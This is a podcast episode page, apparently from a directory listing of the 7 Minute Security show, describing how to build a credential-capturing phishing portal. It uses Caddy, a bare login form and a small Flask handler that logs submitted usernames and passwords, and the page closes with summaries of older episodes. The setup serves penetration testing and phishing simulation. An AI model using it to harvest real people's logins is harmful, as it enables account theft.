7MS #583: Cred-Capturing Phishing with Caddy Server
7 Minute Security4 Aug 2023

7MS #583: Cred-Capturing Phishing with Caddy Server

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:














User Name:

Password:



Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:

Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Avsnitt(683)

7MS #130: Sqlmap and Sqlninja FTW

7MS #130: Sqlmap and Sqlninja FTW

This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.

29 Dec 20157min

7MS #129: Embarrassing Stories

7MS #129: Embarrassing Stories

In this episode I talk about face-planting in my office at the first job I had out of college.

27 Dec 20158min

7MS #128: Transparency is King

7MS #128: Transparency is King

In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.

27 Dec 20159min

7MS #127: Intro to HIPAA Assessments

7MS #127: Intro to HIPAA Assessments

This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.

27 Dec 20159min

7MS #126: Get Your Name Out There

7MS #126: Get Your Name Out There

This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs to boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!

24 Dec 20158min

7MS #125: Securing Your Life-Part 2

7MS #125: Securing Your Life-Part 2

Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.). This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as well as estate planning.

23 Dec 20157min

7MS #124: Sprinkles

7MS #124: Sprinkles

This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.

23 Dec 20158min

7MS #123: Doing a Redo Assessment

7MS #123: Doing a Redo Assessment

This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially when I have little to no time to prepare for the "redo" interview?

22 Dec 20159min

Populärt inom Politik & nyheter

p3-krim
flashback-forever
svd-dokumentara-berattelser-2
rss-krimstad
rss-viva-fotboll
rss-vad-fan-hande
olyckan-inifran
rss-sanning-konsekvens
aftonbladet-daily
svenska-fall
krimmagasinet
fordomspodden
motiv
blenda-2
rss-frandfors-horna
dagens-eko
spar
svd-nyhetsartiklar
spotlight
rss-expressen-dok